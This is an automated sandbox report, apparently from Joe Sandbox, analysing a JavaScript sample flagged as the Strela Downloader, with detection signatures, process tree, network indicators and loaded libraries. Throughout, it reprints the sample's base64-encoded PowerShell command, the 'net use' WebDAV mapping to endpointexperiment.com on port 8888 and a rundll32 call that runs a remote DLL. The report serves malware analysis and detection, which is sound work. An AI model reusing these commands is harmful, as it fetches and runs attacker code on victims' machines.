Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1770711382873314149.js

Overview

General Information

Sample name:1770711382873314149.js
Analysis ID:1541881
MD5:02b6585ed7a7a60651ef2ca093714d92
SHA1:4a355a6d5519ea326660c58d9eee8043dabc8310
SHA256:34e9df65677f7e89fd3514103d9a75f7fb526485f1c8fa3bf82fe8896991683a
Tags:jsuser-lowmal3
Infos:

Detection

Strela Downloader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Encrypted powershell cmdline option found
JavaScript source code contains functionality to generate code involving a shell, file or stream
Opens network shares
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Communication To Uncommon Desusertion Ports
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wscript.exe (PID: 1280 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1770711382873314149.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA5ADEANQA4ADkAMAA2ADIAOQAyADEAMQAuAGQAbABsACwARQBuAHQAcgB5AA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 1236 cmdline: "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • rundll32.exe (PID: 2168 cmdline: "C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\2915890629211.dll,Entry MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3788JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_3788.amsi.csvJoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\2915890629211.dll,Entry, CommandLine: "C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\2915890629211.dll,Entry, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA5ADEANQA4ADkAMAA2ADIAOQAyADEAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3788, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\2915890629211.dll,Entry, ProcessId: 2168, ProcessName: rundll32.exe
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1770711382873314149.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1770711382873314149.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1770711382873314149.js", ProcessId: 1280, ProcessName: wscript.exe
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DesusertionIp: 94.159.113.48, DesusertionIsIpv6: false, DesusertionPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 1236, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49732
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA5ADEANQA4ADkAMAA2ADIAOQAyADEAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA5ADEANQA4ADkAMAA2ADIAOQAyADEAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1770711382873314149.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 1280, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA5ADEANQA4ADkAMAA2ADIAOQAyADEAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, ProcessId: 3788, ProcessName: powershell.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1770711382873314149.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1770711382873314149.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1770711382873314149.js", ProcessId: 1280, ProcessName: wscript.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA5ADEANQA4ADkAMAA2ADIAOQAyADEAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA5ADEANQA4ADkAMAA2ADIAOQAyADEAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1770711382873314149.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 1280, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA5ADEANQA4ADkAMAA2ADIAOQAyADEAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, ProcessId: 3788, ProcessName: powershell.exe
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\, CommandLine: "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA5ADEANQA4ADkAMAA2ADIAOQAyADEAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3788, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\, ProcessId: 1236, ProcessName: net.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\, CommandLine: "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA5ADEANQA4ADkAMAA2ADIAOQAyADEAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3788, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\, ProcessId: 1236, ProcessName: net.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Software Vulnerabilities

      barindex
      Source: 1770711382873314149.jsArgument value : ['"WScript.Shell"', '"powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4A']Go to definition
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\System32\rundll32.exe

      Networking

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49732
      Source: global trafficTCP traffic: 192.168.2.9:49732 -> 94.159.113.48:8888
      Source: Joe Sandbox ViewIP Address: 94.159.113.48 94.159.113.48
      Source: Joe Sandbox ViewASN Name: NETCOM-R-ASRU NETCOM-R-ASRU
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: endpointexperiment.com
      Source: net.exe, 00000004.00000003.1385387102.000001F22FB9A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1385712398.000001F22FB9A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1385656869.000001F22FB70000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1385781807.000001F22FBFB000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1385338666.000001F22FBF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://endpointexperiment.com:8888/
      Source: powershell.exe, 00000002.00000002.1388013201.00000223CB187000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.1388013201.00000223CB13A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
      Source: powershell.exe, 00000002.00000002.1388013201.00000223CB172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Source: Yara matchFile source: amsi64_3788.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3788, type: MEMORYSTR

      System Summary

      barindex
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA5ADEANQA4ADkAMAA2ADIAOQAyADEAMQAuAGQAbABsACwARQBuAHQAcgB5AA==
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA5ADEANQA4ADkAMAA2ADIAOQAyADEAMQAuAGQAbABsACwARQBuAHQAcgB5AA==Jump to behavior
      Source: 1770711382873314149.jsInitial sample: Strings found which are bigger than 50
      Source: classification engineClassification label: mal92.rans.troj.spyw.expl.evad.winJS@8/3@1/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbkefjot.scl.ps1Jump to behavior
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\2915890629211.dll,Entry
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1770711382873314149.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA5ADEANQA4ADkAMAA2ADIAOQAyADEAMQAuAGQAbABsACwARQBuAHQAcgB5AA==
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\2915890629211.dll,Entry
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA5ADEANQA4ADkAMAA2ADIAOQAyADEAMQAuAGQAbABsACwARQBuAHQAcgB5AA==Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\2915890629211.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
